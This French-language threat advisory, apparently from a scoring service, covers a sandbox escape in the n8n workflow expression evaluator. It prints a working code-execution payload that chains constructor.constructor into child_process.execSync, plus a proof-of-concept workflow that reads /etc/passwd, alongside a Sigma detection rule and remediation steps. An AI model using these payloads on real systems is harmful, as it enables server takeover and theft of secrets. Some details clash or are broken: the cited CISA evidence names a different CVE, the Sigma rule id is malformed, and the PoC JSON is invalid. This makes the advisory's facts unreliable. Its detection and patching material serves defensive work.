CVE-2026-85165 : évasion de sandbox dans le moteur d'expressions N8N
HERMES
SCORE DE MENACE HERMES & ÉVALUATION D'INFRASTRUCTURE AGENTIQUE
Cible :n8n Automation Platform (Workflow Expression Evaluator Sandbox) Confiance : 98%
97 / 100
Décomposition des dimensions
Exploitabilité 19 / 20
Activité de menace 18 / 20
Militarisation 18 / 20
Exposition 18 / 20
Prévalence 17 / 20
Impact 19 / 20
Maturité de l'exploit 18 / 20
Potentiel d'attaque en chaîne 18 / 20
Divergence & Justification opérationnelle
Le CVSS v3.1 attribue la note de 9.9 (Critique), et le score Hermes Threat Score s'établit à 97 (CRITIQUE). Cette vulnérabilité permet à tout utilisateur pouvant éditer un flux d'échapper au bac à sable JavaScript et de dérober l'ensemble des variables d'environnement de l'hôte.
🕸️ Graphe de connaissances connecté & Provenance
CVE-2026-85165: n8n Expression Sandbox Escape via Prototype ResolutionVULNÉRABILITÉ
Nœuds connectés : 1
Relations sortantes actives
→ affectsCOMPOSANTn8n Workflow Automation
98% VERY_HIGH
Software platform affected by security vulnerabilities and agentic attack patterns.
🔍 Pourquoi cette relation ? (Preuves & Provenance)
“Confirmed security vulnerability in n8n Workflow Automation documented in Hermes dossier.”
Preuves vérifiées associées :
- [vulnerability_report]
- [government_confirmation]CISA verified active exploitation in the wild and mandated federal remediation deadline in KEV entry. — Source : Cybersecurity & Infrastructure Security Agency (CISA): CISA Adds CVE-2026-59822 to Known Exploited Vulnerabilities Catalog (Fiabilité : VERY_HIGH)
1. Contexte technique & matrice d’impact
Section intitulée « 1. Contexte technique & matrice d’impact »| Paramètre | Spécification Technique | Contexte de Menace |
|---|---|---|
| Identifiant CVE | CVE-2026-85165 | Menaces IA Agentique & Protocole MCP |
| Produit ciblé | n8n Automation Platform | n8n GmbH |
| Composant affecté | Workflow Expression Evaluator Sandbox | Orchestrateur et couche d’outils agentiques |
| Nature de la faille | CWE-94: Code Injection / CWE-1321: Prototype Pollution | Violation d’intégrité et d’exécution |
| Versions vulnérables | all versions prior to 2.36.2 | Environnements en production |
| Correctif disponible | 2.36.2 | Mise à jour impérative |
2. Analyse technique approfondie
Section intitulée « 2. Analyse technique approfondie »Mécanique de l’évasion de bac à sable
Section intitulée « Mécanique de l’évasion de bac à sable »Les objets helpers exposés dans le contexte d’évaluation ($jmespath, $moment) n’avaient pas leurs prototypes gelés. En chaînant .constructor.constructor, le constructeur Function renvoyé s’exécute dans le contexte global de Node.js et non dans le contexte sécurisé :
// Payload d'expression malveillante{{ $jmespath.constructor.constructor( 'return process.mainModule.require("child_process").execSync("id").toString()' )()}}+----------------------------------------------------------------------------------------------------+| CYCLE D'ATTAQUE CVE-2026-85165 |+----------------------------------------------------------------------------------------------------+
[Attaquant / Injection de Prompt] │ │ [1] Émission du payload ciblant l'interface d'outil ou l'orchestrateur ▼ [n8n Automation Platform] │ ├───► 1. Ingestion par Workflow Expression Evaluator Sandbox │ - Échec de validation, absence de filtrage ou contournement de sandbox │ ├───► 2. Exécution / Mutation d'état │ - Exécution de commandes OS ou exfiltration d'identifiants │ ▼ [Infrastructure Cible Compromise] │ └───► Vol de données, prise de contrôle du serveur ou persistance+----------------------------------------------------------------------------------------------------+3. Preuve de concept (PoC) & analyse du payload
Section intitulée « 3. Preuve de concept (PoC) & analyse du payload »{ "nodes": [ { "name": "Code Execution Node", "type": "n8n-nodes-base.set", "typeVersion": 2, "position": [250, 300], "parameters": { "values": { "string": [ { "name": "rce_output", "value": "={{ $jmespath.constructor.constructor('return process.mainModule.require("child_process").execSync("cat /etc/passwd").toString()')() }}" } ] } } } ]}4. Ingénierie de détection & télémétrie
Section intitulée « 4. Ingénierie de détection & télémétrie »Règle de détection Sigma
Section intitulée « Règle de détection Sigma »title: n8n Sandbox Escape Expression Evaluationid: 85165c01-e165-4a1b-8f21-n8nsandbox01status: highdescription: Detects attempts to walk prototype constructors or invoke process.mainModule within n8n workflow expressions.author: Hermes Codex Detection Engineeringdate: 2026-09-05logsource: product: n8n service: executiondetection: selection: payload|contains: - 'constructor.constructor' - 'process.mainModule' - 'child_process' - '__proto__' condition: selectionlevel: critical5. Guide de remédiation & plan d’action
Section intitulée « 5. Guide de remédiation & plan d’action »- Appliquer les correctifs : mettre à jour
n8n Automation Platformvers la version2.36.2sans délai. - Restreindre les outils MCP : vérifier les déclarations d’outils et isoler les exécutions dans des conteneurs sandboxés éphémères.
- Auditer les journaux système : examiner les logs d’exécution pour repérer d’éventuels processus enfants anormaux ou appels réseau suspects.
- Appliquer le moindre privilège : restreindre les comptes de service associés aux agents sur les bases de données et les clés cloud.